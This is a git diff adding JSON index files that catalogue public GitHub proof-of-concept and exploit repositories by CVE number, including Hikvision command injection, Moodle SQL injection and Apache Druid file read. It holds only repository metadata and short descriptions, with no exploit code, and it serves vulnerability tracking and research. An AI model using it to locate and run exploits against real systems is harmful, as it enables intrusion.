diff --git a/2021/CVE-2021-3625.json b/2021/CVE-2021-3625.json
new file mode 100644
index 0000000000..f54a3c0bb8
--- /dev/null
+++ b/2021/CVE-2021-3625.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 414209100,
+ "name": "zephyr_cve-2021-3625",
+ "full_name": "szymonh\/zephyr_cve-2021-3625",
+ "owner": {
+ "login": "szymonh",
+ "id": 12231135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4",
+ "html_url": "https:\/\/github.com\/szymonh"
+ },
+ "html_url": "https:\/\/github.com\/szymonh\/zephyr_cve-2021-3625",
+ "description": "CVE-2021-3625 - Sample exploits for Zephyr",
+ "fork": false,
+ "created_at": "2021-10-06T12:47:24Z",
+ "updated_at": "2022-11-10T12:01:06Z",
+ "pushed_at": "2021-10-07T08:51:59Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "security",
+ "vulnerability",
+ "zephyr"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36260.json b/2021/CVE-2021-36260.json
new file mode 100644
index 0000000000..911a753bd4
--- /dev/null
+++ b/2021/CVE-2021-36260.json
@@ -0,0 +1,245 @@
+[
+ {
+ "id": 418375861,
+ "name": "CVE-2021-36260",
+ "full_name": "rabbitsafe\/CVE-2021-36260",
+ "owner": {
+ "login": "rabbitsafe",
+ "id": 33046073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046073?v=4",
+ "html_url": "https:\/\/github.com\/rabbitsafe"
+ },
+ "html_url": "https:\/\/github.com\/rabbitsafe\/CVE-2021-36260",
+ "description": "CVE-2021-36260",
+ "fork": false,
+ "created_at": "2021-10-18T06:40:48Z",
+ "updated_at": "2023-07-18T15:48:37Z",
+ "pushed_at": "2023-10-27T02:20:32Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 421880973,
+ "name": "CVE-2021-36260",
+ "full_name": "Aiminsun\/CVE-2021-36260",
+ "owner": {
+ "login": "Aiminsun",
+ "id": 58260225,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58260225?v=4",
+ "html_url": "https:\/\/github.com\/Aiminsun"
+ },
+ "html_url": "https:\/\/github.com\/Aiminsun\/CVE-2021-36260",
+ "description": "command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.",
+ "fork": false,
+ "created_at": "2021-10-27T15:51:12Z",
+ "updated_at": "2024-06-22T13:51:13Z",
+ "pushed_at": "2021-10-28T06:37:37Z",
+ "stargazers_count": 235,
+ "watchers_count": 235,
+ "has_discussions": false,
+ "forks_count": 74,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 74,
+ "watchers": 235,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 424140037,
+ "name": "CVE-2021-36260-metasploit",
+ "full_name": "TaroballzChen\/CVE-2021-36260-metasploit",
+ "owner": {
+ "login": "TaroballzChen",
+ "id": 27862593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4",
+ "html_url": "https:\/\/github.com\/TaroballzChen"
+ },
+ "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-36260-metasploit",
+ "description": "the metasploit script(POC) about CVE-2021-36260 ",
+ "fork": false,
+ "created_at": "2021-11-03T08:11:49Z",
+ "updated_at": "2023-12-22T07:08:19Z",
+ "pushed_at": "2021-11-03T08:26:24Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437809411,
+ "name": "CheckHKRCE",
+ "full_name": "tuntin9x\/CheckHKRCE",
+ "owner": {
+ "login": "tuntin9x",
+ "id": 42837549,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42837549?v=4",
+ "html_url": "https:\/\/github.com\/tuntin9x"
+ },
+ "html_url": "https:\/\/github.com\/tuntin9x\/CheckHKRCE",
+ "description": "CVE-2021-36260",
+ "fork": false,
+ "created_at": "2021-12-13T09:23:36Z",
+ "updated_at": "2023-12-22T03:01:10Z",
+ "pushed_at": "2022-10-27T01:14:34Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 520972929,
+ "name": "CVE-2021-36260",
+ "full_name": "Cuerz\/CVE-2021-36260",
+ "owner": {
+ "login": "Cuerz",
+ "id": 84277976,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84277976?v=4",
+ "html_url": "https:\/\/github.com\/Cuerz"
+ },
+ "html_url": "https:\/\/github.com\/Cuerz\/CVE-2021-36260",
+ "description": "海康威视RCE漏洞 批量检测和利用工具",
+ "fork": false,
+ "created_at": "2022-08-03T17:27:59Z",
+ "updated_at": "2024-06-09T10:53:26Z",
+ "pushed_at": "2022-08-05T19:57:30Z",
+ "stargazers_count": 128,
+ "watchers_count": 128,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-36260",
+ "exploit"
+ ],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 128,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 530277219,
+ "name": "Simple-CVE-2021-36260",
+ "full_name": "TakenoSite\/Simple-CVE-2021-36260",
+ "owner": {
+ "login": "TakenoSite",
+ "id": 84880497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84880497?v=4",
+ "html_url": "https:\/\/github.com\/TakenoSite"
+ },
+ "html_url": "https:\/\/github.com\/TakenoSite\/Simple-CVE-2021-36260",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-29T15:21:11Z",
+ "updated_at": "2023-05-10T06:31:35Z",
+ "pushed_at": "2022-08-31T11:27:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 667627206,
+ "name": "hikvision_brute",
+ "full_name": "r3t4k3r\/hikvision_brute",
+ "owner": {
+ "login": "r3t4k3r",
+ "id": 86055096,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86055096?v=4",
+ "html_url": "https:\/\/github.com\/r3t4k3r"
+ },
+ "html_url": "https:\/\/github.com\/r3t4k3r\/hikvision_brute",
+ "description": "Brute Hikvision CAMS with CVE-2021-36260 Exploit",
+ "fork": false,
+ "created_at": "2023-07-18T00:31:47Z",
+ "updated_at": "2024-05-25T05:20:13Z",
+ "pushed_at": "2023-07-29T17:41:39Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 708419065,
+ "name": "HIK-CVE-2021-36260-Exploit",
+ "full_name": "haingn\/HIK-CVE-2021-36260-Exploit",
+ "owner": {
+ "login": "haingn",
+ "id": 52133074,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52133074?v=4",
+ "html_url": "https:\/\/github.com\/haingn"
+ },
+ "html_url": "https:\/\/github.com\/haingn\/HIK-CVE-2021-36260-Exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-22T14:09:18Z",
+ "updated_at": "2023-10-22T14:09:32Z",
+ "pushed_at": "2023-10-22T14:09:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36393.json b/2021/CVE-2021-36393.json
new file mode 100644
index 0000000000..9fdc24b9b8
--- /dev/null
+++ b/2021/CVE-2021-36393.json
@@ -0,0 +1,67 @@
+[
+ {
+ "id": 710897618,
+ "name": "CVE-2021-36393",
+ "full_name": "StackOverflowExcept1on\/CVE-2021-36393",
+ "owner": {
+ "login": "StackOverflowExcept1on",
+ "id": 109800286,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109800286?v=4",
+ "html_url": "https:\/\/github.com\/StackOverflowExcept1on"
+ },
+ "html_url": "https:\/\/github.com\/StackOverflowExcept1on\/CVE-2021-36393",
+ "description": "Error-based blind SQL injection with bit-shifting approach for Moodle 3.10.4",
+ "fork": false,
+ "created_at": "2023-10-27T17:13:55Z",
+ "updated_at": "2024-04-20T12:29:21Z",
+ "pushed_at": "2023-12-29T14:12:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "moodle",
+ "sql-injection",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 714260511,
+ "name": "CVE-2021-36393-Exploit",
+ "full_name": "T0X1Cx\/CVE-2021-36393-Exploit",
+ "owner": {
+ "login": "T0X1Cx",
+ "id": 71453093,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71453093?v=4",
+ "html_url": "https:\/\/github.com\/T0X1Cx"
+ },
+ "html_url": "https:\/\/github.com\/T0X1Cx\/CVE-2021-36393-Exploit",
+ "description": "This script demonstrates a time-based blind SQL injection on Moodle platforms, exploiting response delays to extract data.",
+ "fork": false,
+ "created_at": "2023-11-04T11:45:55Z",
+ "updated_at": "2024-06-15T10:37:49Z",
+ "pushed_at": "2023-11-04T19:17:16Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36394.json b/2021/CVE-2021-36394.json
new file mode 100644
index 0000000000..c685285eb9
--- /dev/null
+++ b/2021/CVE-2021-36394.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 400700031,
+ "name": "CVE-2021-36394",
+ "full_name": "dinhbaouit\/CVE-2021-36394",
+ "owner": {
+ "login": "dinhbaouit",
+ "id": 17717385,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17717385?v=4",
+ "html_url": "https:\/\/github.com\/dinhbaouit"
+ },
+ "html_url": "https:\/\/github.com\/dinhbaouit\/CVE-2021-36394",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-28T04:21:44Z",
+ "updated_at": "2024-02-05T05:21:30Z",
+ "pushed_at": "2021-08-29T14:06:28Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 485686630,
+ "name": "CVE-2021-36394-Pre-Auth-RCE-in-Moodle",
+ "full_name": "lavclash75\/CVE-2021-36394-Pre-Auth-RCE-in-Moodle",
+ "owner": {
+ "login": "lavclash75",
+ "id": 46343695,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46343695?v=4",
+ "html_url": "https:\/\/github.com\/lavclash75"
+ },
+ "html_url": "https:\/\/github.com\/lavclash75\/CVE-2021-36394-Pre-Auth-RCE-in-Moodle",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T07:52:24Z",
+ "updated_at": "2024-02-26T23:45:09Z",
+ "pushed_at": "2022-05-02T17:17:16Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36460.json b/2021/CVE-2021-36460.json
new file mode 100644
index 0000000000..8ba9ab3b16
--- /dev/null
+++ b/2021/CVE-2021-36460.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484357238,
+ "name": "CVE-2021-36460",
+ "full_name": "martinfrancois\/CVE-2021-36460",
+ "owner": {
+ "login": "martinfrancois",
+ "id": 14319020,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14319020?v=4",
+ "html_url": "https:\/\/github.com\/martinfrancois"
+ },
+ "html_url": "https:\/\/github.com\/martinfrancois\/CVE-2021-36460",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T08:33:47Z",
+ "updated_at": "2022-04-22T08:33:47Z",
+ "pushed_at": "2022-04-22T08:34:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3656.json b/2021/CVE-2021-3656.json
new file mode 100644
index 0000000000..81982f70ae
--- /dev/null
+++ b/2021/CVE-2021-3656.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 562227251,
+ "name": "CVE-2021-3656-Demo",
+ "full_name": "rami08448\/CVE-2021-3656-Demo",
+ "owner": {
+ "login": "rami08448",
+ "id": 77466752,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77466752?v=4",
+ "html_url": "https:\/\/github.com\/rami08448"
+ },
+ "html_url": "https:\/\/github.com\/rami08448\/CVE-2021-3656-Demo",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-11-05T17:32:47Z",
+ "updated_at": "2023-03-20T20:09:22Z",
+ "pushed_at": "2022-11-22T03:03:14Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36563.json b/2021/CVE-2021-36563.json
new file mode 100644
index 0000000000..9d17db2bb3
--- /dev/null
+++ b/2021/CVE-2021-36563.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 389955098,
+ "name": "CVE-2021-36563",
+ "full_name": "Edgarloyola\/CVE-2021-36563",
+ "owner": {
+ "login": "Edgarloyola",
+ "id": 43635073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4",
+ "html_url": "https:\/\/github.com\/Edgarloyola"
+ },
+ "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-36563",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-27T11:22:21Z",
+ "updated_at": "2024-05-21T15:43:55Z",
+ "pushed_at": "2022-09-16T17:53:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36593.json b/2021/CVE-2021-36593.json
new file mode 100644
index 0000000000..443e7c66fd
--- /dev/null
+++ b/2021/CVE-2021-36593.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 794884984,
+ "name": "Statement",
+ "full_name": "mir-hossein\/Statement",
+ "owner": {
+ "login": "mir-hossein",
+ "id": 71374198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71374198?v=4",
+ "html_url": "https:\/\/github.com\/mir-hossein"
+ },
+ "html_url": "https:\/\/github.com\/mir-hossein\/Statement",
+ "description": "About CVE-2021-36593 and CVE-2021-36594",
+ "fork": false,
+ "created_at": "2024-05-02T06:41:14Z",
+ "updated_at": "2024-05-02T06:43:37Z",
+ "pushed_at": "2024-05-02T06:42:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36630.json b/2021/CVE-2021-36630.json
new file mode 100644
index 0000000000..e3b0671615
--- /dev/null
+++ b/2021/CVE-2021-36630.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 589168903,
+ "name": "CVE-2021-36630",
+ "full_name": "lixiang957\/CVE-2021-36630",
+ "owner": {
+ "login": "lixiang957",
+ "id": 34414625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34414625?v=4",
+ "html_url": "https:\/\/github.com\/lixiang957"
+ },
+ "html_url": "https:\/\/github.com\/lixiang957\/CVE-2021-36630",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-15T09:55:38Z",
+ "updated_at": "2023-01-20T07:30:16Z",
+ "pushed_at": "2023-01-15T10:01:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36747.json b/2021/CVE-2021-36747.json
new file mode 100644
index 0000000000..c4b6c87bdd
--- /dev/null
+++ b/2021/CVE-2021-36747.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 387884646,
+ "name": "CVE-2021-36747",
+ "full_name": "cseasholtz\/CVE-2021-36747",
+ "owner": {
+ "login": "cseasholtz",
+ "id": 9737260,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9737260?v=4",
+ "html_url": "https:\/\/github.com\/cseasholtz"
+ },
+ "html_url": "https:\/\/github.com\/cseasholtz\/CVE-2021-36747",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-20T18:45:30Z",
+ "updated_at": "2022-09-14T16:21:49Z",
+ "pushed_at": "2021-07-20T19:32:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36749.json b/2021/CVE-2021-36749.json
new file mode 100644
index 0000000000..56cef0a042
--- /dev/null
+++ b/2021/CVE-2021-36749.json
@@ -0,0 +1,156 @@
+[
+ {
+ "id": 369719890,
+ "name": "PocList",
+ "full_name": "sma11new\/PocList",
+ "owner": {
+ "login": "sma11new",
+ "id": 53944964,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53944964?v=4",
+ "html_url": "https:\/\/github.com\/sma11new"
+ },
+ "html_url": "https:\/\/github.com\/sma11new\/PocList",
+ "description": "漏洞POC、EXP合集,持续更新。Apache Druid-任意文件读取(CVE-2021-36749)、ConfluenceRCE(CVE-2021-26084)、ZeroShell防火墙RCE(CVE-2019-12725)、ApacheSolr任意文件读取、蓝凌OA任意文件读取、phpStudyRCE、ShowDoc任意文件上传、原创先锋后台未授权、Kyan账号密码泄露、TerraMasterTos任意文件读取、TamronOS-IPTV系统RCE、Wayos防火墙账号密码泄露",
+ "fork": false,
+ "created_at": "2021-05-22T05:06:33Z",
+ "updated_at": "2024-05-21T07:13:26Z",
+ "pushed_at": "2021-11-21T10:34:06Z",
+ "stargazers_count": 157,
+ "watchers_count": 157,
+ "has_discussions": false,
+ "forks_count": 37,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2019-12725",
+ "cve-2021-26084",
+ "cve-2021-36749"
+ ],
+ "visibility": "public",
+ "forks": 37,
+ "watchers": 157,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 416979824,
+ "name": "CVE-2021-36749",
+ "full_name": "BrucessKING\/CVE-2021-36749",
+ "owner": {
+ "login": "BrucessKING",
+ "id": 39517489,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39517489?v=4",
+ "html_url": "https:\/\/github.com\/BrucessKING"
+ },
+ "html_url": "https:\/\/github.com\/BrucessKING\/CVE-2021-36749",
+ "description": "Apache Druid 任意文件读取",
+ "fork": false,
+ "created_at": "2021-10-14T03:47:02Z",
+ "updated_at": "2023-09-28T11:32:19Z",
+ "pushed_at": "2021-10-15T02:31:03Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 417224229,
+ "name": "CVE-2021-36749",
+ "full_name": "dorkerdevil\/CVE-2021-36749",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-36749",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-14T17:30:55Z",
+ "updated_at": "2023-09-28T11:32:20Z",
+ "pushed_at": "2022-01-09T15:38:45Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 430263283,
+ "name": "apache_druid_CVE-2021-36749",
+ "full_name": "zwlsix\/apache_druid_CVE-2021-36749",
+ "owner": {
+ "login": "zwlsix",
+ "id": 88372814,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88372814?v=4",
+ "html_url": "https:\/\/github.com\/zwlsix"
+ },
+ "html_url": "https:\/\/github.com\/zwlsix\/apache_druid_CVE-2021-36749",
+ "description": "CVE-2021-36749 Docker 漏洞复现",
+ "fork": false,
+ "created_at": "2021-11-21T03:23:00Z",
+ "updated_at": "2021-12-02T09:51:28Z",
+ "pushed_at": "2021-11-21T10:26:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437588032,
+ "name": "CVE-2021-36749",
+ "full_name": "Jun-5heng\/CVE-2021-36749",
+ "owner": {
+ "login": "Jun-5heng",
+ "id": 88525975,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4",
+ "html_url": "https:\/\/github.com\/Jun-5heng"
+ },
+ "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-36749",
+ "description": "Apache Druid LoadData 任意文件读取漏洞 \/ Code By:Jun_sheng",
+ "fork": false,
+ "created_at": "2021-12-12T15:50:02Z",
+ "updated_at": "2021-12-12T17:52:28Z",
+ "pushed_at": "2021-12-12T17:52:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36782.json b/2021/CVE-2021-36782.json
new file mode 100644
index 0000000000..4bf3fafe6b
--- /dev/null
+++ b/2021/CVE-2021-36782.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 573138430,
+ "name": "tf-cve-2021-36782",
+ "full_name": "fe-ax\/tf-cve-2021-36782",
+ "owner": {
+ "login": "fe-ax",
+ "id": 1322541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1322541?v=4",
+ "html_url": "https:\/\/github.com\/fe-ax"
+ },
+ "html_url": "https:\/\/github.com\/fe-ax\/tf-cve-2021-36782",
+ "description": "A Terraform module to launch Rancher 2.6.6 for blog article about CVE-2021-36782",
+ "fork": false,
+ "created_at": "2022-12-01T19:30:27Z",
+ "updated_at": "2022-12-14T13:53:07Z",
+ "pushed_at": "2022-12-12T19:44:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3679.json b/2021/CVE-2021-3679.json
new file mode 100644
index 0000000000..a22aedf88c
--- /dev/null
+++ b/2021/CVE-2021-3679.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 387712955,
+ "name": "RingBufferDetonator",
+ "full_name": "aegistudio\/RingBufferDetonator",
+ "owner": {
+ "login": "aegistudio",
+ "id": 6104287,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6104287?v=4",
+ "html_url": "https:\/\/github.com\/aegistudio"
+ },
+ "html_url": "https:\/\/github.com\/aegistudio\/RingBufferDetonator",
+ "description": "Exploitation for CVE-2021-3679 and document for its fix",
+ "fork": false,
+ "created_at": "2021-07-20T07:42:25Z",
+ "updated_at": "2021-09-11T13:15:34Z",
+ "pushed_at": "2021-07-21T14:09:46Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-36798.json b/2021/CVE-2021-36798.json
new file mode 100644
index 0000000000..28130cff48
--- /dev/null
+++ b/2021/CVE-2021-36798.json
@@ -0,0 +1,94 @@
+[
+ {
+ "id": 397919131,
+ "name": "CVE-2021-36798",
+ "full_name": "M-Kings\/CVE-2021-36798",
+ "owner": {
+ "login": "M-Kings",
+ "id": 66290587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66290587?v=4",
+ "html_url": "https:\/\/github.com\/M-Kings"
+ },
+ "html_url": "https:\/\/github.com\/M-Kings\/CVE-2021-36798",
+ "description": "Cobalt Strike < 4.4 dos CVE-2021-36798 ",
+ "fork": false,
+ "created_at": "2021-08-19T11:26:51Z",
+ "updated_at": "2023-12-11T06:17:37Z",
+ "pushed_at": "2021-08-19T11:46:12Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-36798"
+ ],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 403602684,
+ "name": "CobaltStrikeDos",
+ "full_name": "JamVayne\/CobaltStrikeDos",
+ "owner": {
+ "login": "JamVayne",
+ "id": 39869990,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39869990?v=4",
+ "html_url": "https:\/\/github.com\/JamVayne"
+ },
+ "html_url": "https:\/\/github.com\/JamVayne\/CobaltStrikeDos",
